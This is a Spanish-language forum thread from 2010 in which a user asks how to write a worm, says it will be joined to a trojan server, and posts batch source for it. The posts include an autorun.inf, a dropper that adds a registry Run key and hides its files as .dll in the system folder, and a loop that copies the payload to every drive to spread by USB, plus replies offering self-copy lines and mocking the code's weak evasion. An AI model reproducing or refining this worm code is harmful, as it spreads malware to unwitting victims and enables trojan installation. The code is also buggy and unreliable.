Me ayudais

Iniciado por SockMon, 2 Octubre 2010, 21:45 PM

0 Miembros y 1 Visitante están viendo este tema.

SockMon

Hola, soy nuevo, y quiero aprender a crear my propio worms en batch o en visual basic (según me recmendeis) pero prefiero batch ya que es mas facil. He estado buscando pero no encuentro ningun tutorial solo: generadores, algunos ya hechos que se repiten indefinidamente y en cada post dice que lo ha hecho cada uno XD...
No quiero que me lo hagais ustedes (puedes darle un pez a un pobre para que coma por un dia, pero puedes enseñarle a pescar para que no muera de hambre)
Bueno pues si me facilitais un toturial os lo agradezco, mientras tanto seguire buscando  :(
Gracias

[L]ord [R]NA


ApOkAlizE

Crear un gusano mirando por google lo puedes encontrar pero tendrias que decirnos que tipo de gusanillo quieres crear, o sea si quieres que se disperse por internet o si simplemente quieres que se haga varias copias dentro del mismo ordenador y si el gusano come pan o come semillas..(lo ultimo es broma,xd) el caso es que mira si lo que quieres es que se reproduzca dentro del mismo PC es fácil.
en Batch seria esto:
Copy /y "C:\rutadelgusanillo.bat" "C:\rutadondequieresquesehagalacopiadelgusanillo.bat"
en VB almenos en la versión 6.0 es así:
Filecopy "C:\rutadedondeseencuentraelgusanillo.exe" "C:\rutadedondequieresqueseguardeelgusanillo.exe"
eso si hay algunas versiones de VB como por ejemplo la 2008 creo, que además de Filecopy es Copyfile pero bueno tu prueva de ambas formas y una tiene que funcionar, y recuerda que por VB tambien peudes ejecutar acciones por la shell, es que si haces un gusano en Batch lo malo es que sale la ventana de MS-DOS y eso da el cantazo. si lo que tu quieres es que el gusanillo se reproduzca por internet entonces te aconsejo que lo dejes para más adelante ya que par eso tienes que usar APIs y algo más de conocimientos, pero vamos te aconsejo VB ya que Batch es muy lammer...
Los virus informaticos son como las personas, hacen lo posible para destruir y hacen lo impossible para no ser destruidos... - ApOkAlizE

SockMon

Hola de nuevo, primero digo que lo estoy haciendo en batch ya que la pc que tengo ahora no tiene instalado el BV >:( (tengo en 2008). He empezado a leer un manual y por ahora estoy intentando hacer la propagacion por usb y p2p, veremos como sale.
Quiero especificar que el worms lo estoy haciendo para unirlo con un server del troyano.
Buenas noches ;)

[L]ord [R]NA

:¬¬ si hubiese sabido eso previamente no te hubiese dado la informacion.

SockMon

Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código (bash) [Seleccionar]
[AutoRun]
open=data31.exe

q seria el autorun
-----------------------------------------------------------------------
Código (bash) [Seleccionar]
@echo off
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
"Data" /d "data34.bat"
copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
exit

este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?

SockMon

Bueno ya lo he terminado o eso creo, pero creo q tengo varios fallos sobre todo a la hora de propagarse en otros pen. haber que os parece o que sugerencias teneis.
-----------------------------------------------------------------------------------------------
Los archivos son:
+autorun.inf
+data31.bat
+data32.exe (virus)
+data34.bat
------------------------------------------------------------------------------------------------
Código (dos) [Seleccionar]

[AutoRun]
open=data31.bat

------------------------------------------------------------------------------------------------
Código (dos) [Seleccionar]
@echo off
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
"Data" /d "data34.bat"
copy /y "data32.exe" "%systemroot%\windows\system\data32.dll"
copy /y "autorun.inf" "%systemroot%\windows\system\autorun.dll"
copy /y "data31.bat" "%systemroot%\windows\system\data31.dll"
copy /y "data34.bat" "%systemroot%\windows\system\data34.dll"
start "data34.bat"
start "data32.exe"
exit

-------------------------------------------------------------------------------------------------
VIRUS
-------------------------------------------------------------------------------------------------
Código (dos) [Seleccionar]
@echo off
:busca
for %%_ in (a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, s, t, u, v, w, x, y, z) do (
dir /b %%_:\ > nul 2>&1 && (
)
)
IF EXIst "%%_:" GOTO copia
Else GOTO espera
:copia
IF EXIST %systemroot%\windows\system\data32.dll GOTO verifica
Else exit
:verifica
IF EXIT "%%_:\data32.exe" GOTO espera
ELSE GOTO propagar
:propagar
copy /y "%systemroot%\windows\system\data32.dll" "%%_:\data32.exe"
copy /y "%systemroot%\windows\system\autorun.dll" "%%_:\autorun.inf"
copy /y "%systemroot%\windows\system\data31.dll" "%%_:\data31.bat"
copy /y "%systemroot%\windows\system\data34.dll" "%%_:\data34.bat"
:espera
ping -n 100 127.0.0.1 > null
GOTO busca
exit

-------------------------------------------------------------------------------------------------

Jaixon Jax

Cita de: SockMon en  3 Octubre 2010, 02:22 AM
Hola, en 5 minutillo que he tenido libre me ha dado tiempo de hacer esto.
Código (bash) [Seleccionar]
[AutoRun]
open=data31.exe

q seria el autorun
-----------------------------------------------------------------------
Código (bash) [Seleccionar]
@echo off
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v
"Data" /d "data34.bat"
copy /y "data32.exe" "%systemroot%\windows\system\data32.exe"
copy /y "autorun.inf" "%systemroot%\windows\system\autorun.inf"
copy /y "data31.bat" "%systemroot%\windows\system\data31.bat"
exit

este se llamaria data 31 pero me surgen varias dudas
+ Cuando quiero copiar data32, autorun y data31 no pogo en la ruta que esta, ya que supongo que los buscaras en la misma carpeta donde estoy no?
+ Y quiero copiar data31 que seria el que esta en ejecucion habra algun problema?

  Con ese auto run solo infectaras pc en africa y algunos lados de suramerica que no usan so actualizaos ni mucho menos av nuevos .....  :D

  %systemroot% si fura tan facil copiarce alli ........ al paso que vas ese worn solo infectara viejas pentiuns 2 en etiopia, somalia y bangladesh y todos esos sitios donde microsoft no tiene oficinas comerciales  :P  :D ......

SockMon

Hola de nuevo, pero como ya dije es la primera vez que hago esto y no sabia que con eso no iba a llegar a ninguna parte. que solucion le podria dar al autorun  y a %systemroot%?